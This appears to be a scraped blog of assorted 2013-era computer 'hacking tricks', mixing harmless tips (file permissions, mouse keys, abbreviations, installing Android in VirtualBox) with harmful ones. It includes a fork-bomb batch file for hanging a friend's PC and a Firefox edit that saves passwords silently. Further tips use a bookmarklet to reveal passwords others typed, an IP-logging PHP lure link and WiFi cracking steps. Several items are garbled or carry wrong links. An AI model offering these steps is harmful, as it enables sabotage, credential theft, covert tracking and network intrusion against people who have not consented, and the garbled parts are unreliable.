Restrict Access to folder/file using cmd You may have seen may software to lock the folder/files and you may also have seen batch programs to do the same. Today I am going to share with you a Basic Dos Command which will help you to Restrict Access to Folder/File . The only thing you need for this is the Administrator Access on Windows Machine. Follow the Below Given Steps to restrict access: 1.) Open Command Prompt in Windows 2.) Type the Following Command : cacls "" /E /P everyone:n For example: calcs "C:\users \Administrator\Desktop\Lock.txt" / E /P everyone :n 3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success "Processed File: C:\users \Administrator\Desktop\Lock.txt" 4.) Now when you try to open the File/Folder You will get the message "Access is denied" . Now to Unlock Folder/File and to give it the full access, follow below given steps: 1.) Open Command Prompt in Windows 2.) Type the Following Command : cacls "" /E /P everyone:f For example: calcs "C:\users \Administrator\Desktop\Lock.txt" / E /P everyone :f 3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success "Processed File: C:\users \Administrator\Desktop\Lock.txt" 4.) You have successfully unlocked the file/folder

colour chat on Facebook

Below is the list for all the alphabets . Just copy the alphabets one by one , inserting a space between every alphabet. [[107015582669715]] = A [[116067591741123]] = B [[115602405121532]] = C [[112542438763744]] = D [[115430438474268]] = E [[109225112442557]] = F [[111532845537326]] = G [[111356865552629]] = H [[109294689102123]] = I [[126362660720793]] = J [[116651741681944]] = K [[115807951764667]] = L [[106596672714242]] = M [[108634132504932]] = N [[116564658357124]] = O [[111669128857397]] = P [[107061805996548]] = Q [[106699962703083]] = R [[115927268419031]] = S [[112669162092780]] = T [[108983579135532]] = U [[107023745999320]] = V [[106678406038354]] = W [[116740548336581]] = X [[112416755444217]] = Y [[165724910215]] = Z

hack Firefox auto save password

Hack Firefox to autosave password without notificationThis is a featured page Step To Do This Firefox Hack 1) First you need to close firefox. 2) Now locate the nsloginmanagerprompter.js which is normally found in C:\ProgramFiles\MozillaFirefox \Components\ 3) Open nsloginmanagerprompter.js with notepad ++ 4) Replace the entire line 804 to 869 with the following code var pwmgr = this._pwmgr;pwmgr.addLogin(aLogin) ; When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file. To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security. They will be saved into the saved passwords section. Enjoy And donot forget to comment

how to get hanged your friend pc

The easiest way to get your friends PC hanged! To hang windows explorer: Get access to your friend's PC Or try it yourself Open Notepad (Start > All Programs > Accessories > Notepad). Copy the following code and paste it in notepad. @echo off :A start goto:A From the Menu bar, click on File > Save As. The Save As dialog box opens. Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name]. Now Open the hang.bat file and see the computer getting hanged!

how to break hidden password

How To Break Password Behind The Stars Ever wanted to know what is behind those ******** passwords. For example if you want to know password from facebook account that somebody else have typed and left it. Here is post which will help you. . 1)How to break hidden passwords ******** in firefox This is simple. Just copy and paste the following javascript code when in your address bar whenever you are on a site with a login form and it will display the password behind ****** right away. Javascript Code : javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k

change start menu name

Change Start Menu with just One- Click I really was fred up of the different ways to change the name of Start Menu. But finally found out a way to do that easily. Below is a Software that directly changes the name of your Start Menu. download the software utility. You just have to put your name in New Label and you're done. Enjoy your Start Menu. $$$$$$$$$$

use keyboard as mouse

Use Keyboard As Mouse Looking cool computer tricks? Here is something that should pique your interest: Use Keyboard As Mouse, On Screen Keyboard and Transform your Windows XP in to Windows 7. When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter . Use the Numerical pad for controlling the mouse pointer. 5 is for click. + is for double click - for right click. On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick.. To use it go to start-> run and type osk Use Keyboard As Mouse

how to hack college routers

Open all block sites Hello, Here now available a super dupper web browser..... now hack the college router ... 1. Open all the block sites like all social sites facebook,orkut,twitter, omegle ,youtube etc. . 2.Hide your identity with changing your ip address automatically.. just download TOR BROWSER .. and enjoy it..... click below to download tor browser.... DownloadTor Browser Bundle https:// www.torproject.org/download/ download-easy.html.en

how to transfer balance

Balance Transfer Tricks For All Mobile Networks. Here Are Working Balance Transfer Tricks For All Mobile Networks. Airtel : To Transfer Balance In Airtel Just Dial *141# And Follow The Onscreen Instructions. You Can Transfer From 5 To 30 Rupees Of Balance In Airtel. Tata Docomo : To Transfer Balance In Tata Docomo SMS as BT MobileNumber Amount And Send It To 54321. E.g. BT 9876543210 30 To Transfer 30 Rupees Of Balance. !dea : To Transfer Balance In !dea Network Send SMS as GIVE MobileNumber Amount And Send It To 55567. E.g. GIVE 9876543210 30 To Transfer 30 Rupees. Vodafone : To Transfer Balance In Vodafone Dial *131*Amount*Mobile No# E.g. *131*50*9876543210# To Transfer 50 Rupees Of Balance. Uninor : To Transfer Balance In Uninor Just Dial *202*MobileNumber*Amount# E.g. *202*9876543210*30# To Transfer 30 Rupees. Aircel : To Transfer Balance In Aircel Just Dial *122*666# And Follow The Instructions. You Can Transfer 10,20 Or 100 Rupees Of Balance. BSNL : To Transfer Balance In BSNL Just Send SMS GIFT MobileNumber Amount To 53733. E.g. GIFT 9876543210 50 To Transfer 50 Rupees Of Balance

send password protected email

Send password protected emails If you have to send some confidental information like credit card numbers,Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept your email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails. Click here to go LockBin online service. Fill the form with your desired password. In the text filled write your message. You can also attach a file if you want. After this, click on Submit button. Now your password protected mail will be sent. ( Receiver will only get a link to your password protected and encrypted emai l) When receiver clicks on that link it will prompt to enter the password otherwise it will not be open. That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself.

LATEST 2013 RELIANCE HACK TRICK || 1GB FREE 3G DATA

1) Goto this link.http:// www.rcom.co.in/rcom/rworld/ music/mobileCallerUser_ screen1.jsp?plan=postMobileNet 2) Fill ur mobile no. And name. And submit it. 3) U will get Pin code on ur mobile. 4) Fill this Pin code and mob no. Not on above link but any of the following links... For 99rs. Packhttp://rcom.co.in/ rcom/rworld/music/ MobileAuthentication.jsp? AppID=109&plan=postMobileNet +99 and for 29rs. Gprs pack http:// rcom.co.in/rcom/rworld/music/ MobileAuthentication.jsp? AppID=111&plan=postMobileNet +99 and click submit. DONE... By this way u successfully hack reliance Gprs pack. Note: Deactivate ur previous 99rs. Bundle pack before doing this. Enjoy... NOTE: 1) If it ask for std code then add 0 in front of ur mobile no. 2) To deactivate ur previous 99rs pack then call 155223 and enter code 2084 ENJOY...........

HOW TO VIEW UR PROFILE VISITERS

HOW TO VIEW UR PROFILE VISITERS Now right click and select “View Page Source” (or simply clickCtrl + U ). A new tab will open which is full of codes. Press Ctrl + F or F3 from your keyboard. And a new search bar will open at the top right corner.Search for the following text without the quotes : -“ ordered_list.top_friends “The above text would be highlighted and just below the highlighted word you will find a set of numbers.Yeah ! You guessed it right ! Those are the profile ID’s of the people who viewed your facebook profile. The ID’s are in a sequence – the first one being the guy who viewed your facebook profile most numberof time – followed by the others. The last ID in the sequence visits your account very rarely !Ofcourse with those ID’s you won’t be able toguess who actually are they ! So now copy that profile ID. Go to Facebook.com and paste it after adding a “ / “.So your final URL is :-www.facebook.com/ProfileIDLets take for examplewww.facebook.com/100001053506025

HOW TO OPEN MULTIPLE facebook ACCOUNT IN GOOGLE CHROME ??

HOW TO OPEN MULTIPLE facebook ACCOUNT IN GOOGLE CHROME ?? LET SEE GUYS !!! Just press ctrl+shift+N A cognito window will open ...yeahhhhhh :v now u can njoy with multiple account in multiple cognito window !!! :)

how to access content without registration

How to access content without registration !!! To access any type of content whichrequires registrationyou need an username and password of that particular website,it is obvious that you need to register to get an username and password.visit this site http://www.bugmenot.com/ It will provide you fake and workinguser-names and passwords in a sec....so you can save your time without registeration by accessing contents of any websitenjoy guys !!!!

HOW TO BLOCK ADS IN CHROME AND FIREFOX

HOW TO BLOCK ADS IN CHROME AND FIREFOX [SPEED UP YOUR BROWSER BY FILTERING ADS ] 1. AdThwart is a Chrome extension. 2. Firefox AdBlock Plus filter engineto block ads in your favourite browser. you can choose from a number of filter lists, including the good-known EasyList or elsesubscribe to any other AdBlock PlusFilter list. The updates are automatic to this extension, which makes it easy to maintain.As you can see there is a smiling caticon in the browser address barwhen this feature is enabled. You can easily add sites to the filter.You can just disable this extension,as easy as clicking the cat icon in the address bar.Once you uncheck the box saying Enabled for this site,you’ll be able to see the ads again.

Saturday 10 August 2013

hack Facebook chat history

Hack Facebook Chat History There is a simpe easy Trick to Hack Facebook Chat History. We can HackChat History even if our Friends areOffline. To use this Trick follow the simple steps given below : 1) Open Friends profile. 2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard. 3) This will exactly look like :http://www.facebook.com/profile.php?id=XYZ( where XYX can be any numbers and this XYZ is nothing but the ID ). 4) Now in the Address Bar type"javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter. 5) Now it is done. 6) You can see full Chat History now.So this is a simple Trick to Hack Facebook Chat History.

how to get friend's ip address using Facebook

How to Get Friend's IPAddress from Facebook Facebook is now a popular wayto communicate with eachother from all over the world.Sometimes we also want toidentify the person whom weare speaking with, this onlycan be done by knowing his/herIP Address. Getting IP Addressfrom Facebook Chat isn't easy,what we are going to show youis PHP script that you'll host ona free webhosting site thensend the link and retrieve theIP Address.How to Get Friend's IP Addressfrom Facebook Chat Step 1 (Creating PHP File)1) Create a new text documentand edit it.2) Write the following PHP codeinside it:3) Replace "ztuts.com" with anyother link (picture link...)4) Save that as : anything.php(e.g: ip.php) Step 2 ( Webhosting )You can Signup for an accountin any Free webhosting service1) Go to x10hosting2) Signup for an account( choose a right domain namee.g : razor.x10.mx )3) After creating an account onx10hosting, go to the FileManager and open the public_html directory4) Click Upload, and select thePHP file that you created onStep1.4 (ip.php)5) Select all permissions fromRead/Write/Execute (777) Step 3 (Get IP Address )After setting up an account anduploading the .PHP File, it'stime to get IP Address ofany Friend on Facebook 1) Go to the domain that youcreated in Step2.2 in myexample razor.x10.mx 2) You'll see the PHP file thatyou created, right click>CopyAddress Link 3) The link will be somethinglike this : yourdomain.x10.mx/anything.phpIn our example it willbe: razor.x10.mx/ip.php 4) Send that link to any of yourfriends, after he/she clicks onthe link, he/she will beredirected to the link that youreplaced in step1.3 (in myexample : ztuts.com ) 5) Go to your domain nameagain like step1 (e.g:razor.x10.mx) 6) You'll see a new textdocument named ip_log.txt 7) Click that file, you'll get all IPAddresses of your friends thataccessed that link.Done! Now you can track theirIP Location using IP Tracer

how to hack wifi

HOW TO HACK WIFI USING A PC.?? This post is dedicated to all lazy ppl like me who dont wanna surf our page to solve their problems.What u need is 2 softwares : (1 ) Comview. (2) Aircrack ng 1.0 (for windows) Step 1 : Download n install both software, wat u need now is to capture packets usin Comview for WiFi, packets r data dat is been sentback n forth frm d owners pc n d wifi adapter. Step 2 : Play comview, it'll 1st scan all d channels dat r available. Step 3 : Click capture once the desired wifi is found. Step 4 : Save all d data packets in d dump format, once u have enough data packets .Step 5 : Now open up d aircrack-ng gui.exe, for d aircrack menu. Step 6 : Open d folder wer u hav saved all ur packets n launch d aircrack ng gui.if u fail, it means dat u stil dont havenough packets.. so capture more .Step 7 : Just wait for d password to be decrypted.And use the details to login n enjoy internet .Download links : (1 ) Comview for wifi :http://www.tamos.com/download/main/ca.php (2) Aircrack ng 1.0 (for windows) -http://www.tamos.com/download/main/ca.php

how to reset android lock code in emergency

How to Unlock/Reset a AndroidLock in Emergency :1) First of all, you need to swichoff your android device and keep itfor some time .2) Now press the up volumebutton and hold it for 30 seconds. 3) Now press home button andhold it, Then press power buttonand after started your phone justrelease it. 4) Then you can see enter secretandroid menu you never see itbefore, just click on home buttonup and down in the menu. 5) Now click on third option whichis Delete All User Data. 6) Now in this way, your androidlock pattern is unlocked nowproblem is solved if you face any problem commentbelow, Hit like for more android trick

some abbreviation related to internet

Important abbreviations related to internet : FM – Frequency Modulation SIM – Subscriber Identity Module RIM – Removable Identity Module... GSM – Global System For Mobile LAN – Local Area Network WAN – Wide Area Network RTF – Rich Text Format MAN – Metropolitan Area Network URL – Uniform Resource Locator ISP – Inter Net Service Provide@– At The Rate Of DVD – Digital Versatile Disk CD – Compact Disk EDGE – Enhanced Data for GSM Evolution GPRS – General Packet Radio Service FDM – Frequency Division Multiplexing SDR – Software Defined Radio ATM – Asynchronous Transfer Mode DCA – Dynamic Channel Allocation FCA – Fixed Channel Allocation AMPS – Advance Mobile Phone System IMTS – Improved Mobile TelephoneSystem CDMA – Code Division Multiple Access MTSO – Mobile Telephone SwitchingOffice HTTP – Hypertext Transfer Protocol FIDI – Fiber Distributed Data Interface ISDN – Integrated Services Digital Network PSTN – Public Switched Telephone Network CSMA – Carrier Sense Multiple Access RADAR – Radio Detection AndRanging SONET – Synchronous Optical Fiber Network DAMPS – Digital Advanced Mobile Phone System WWW – World Wide Web IP – Internet Protocol TCP – Transmission Control Protocol HTML – HyperText Markup Language USB – Universal Serial Bus PAN - Personal Area Network TDM - Time Division Multiplexing.

how to install android on pc

Installing Android(JellyBeen) On Pc/Laptop Things You Needed:- 1.Oracle VM VirtualBox 2.Android x86 4.2 ImageInstructions: 1.Install VirtualBox on your PC 2.Open VirtualBox and select New. In the dialog box enter the name asyour wish and selecti)Type : Linuxii)Version : Other Linux and select Next 3.In the next dialog box enter the memory size as your wishNote:-Minimum 512Mb required for JellyBeanand select Next 4.In the next dialog box select create a virtual hard drive now. Then select VDI and select fixed ordynamically allocated as your wish and create thevirtual drive 5.Select Virtual device and select settings, a dialog box appears. In the dialog box select i)Storage->Storage Tree->Emptyii)In the attributes section select the Android 4.2 iso file you downloaded and checkLive Cd/Dvd, then click Ok 6.Then start the virtual device. In the screen select Install Android-x86 to hard disk. 7.In the next screen select Create/Modify Partition. 8.Then create a new primary bootable partition and select write. After finishing writing select quit. 9.Then install android in sda1 and select type as ext3 , choose yes for installing grub. 10.After installing remove live iso from VirtualBox and reboot. Now you can boot into Android 4.2.2

how to fast shutdown my system

Very simple tip to fastly shut downyour computer! WNDOWS 7 users!: Press WINDOWS key(do not hold) then 2 times press TAB key(do nothold)Then press ENTER and see whathappens!!!Do it a lil fast! WINDOWS XP USERS!: Press WINDOWS KEYThen press U key two timesThen see!hit like and share if its worked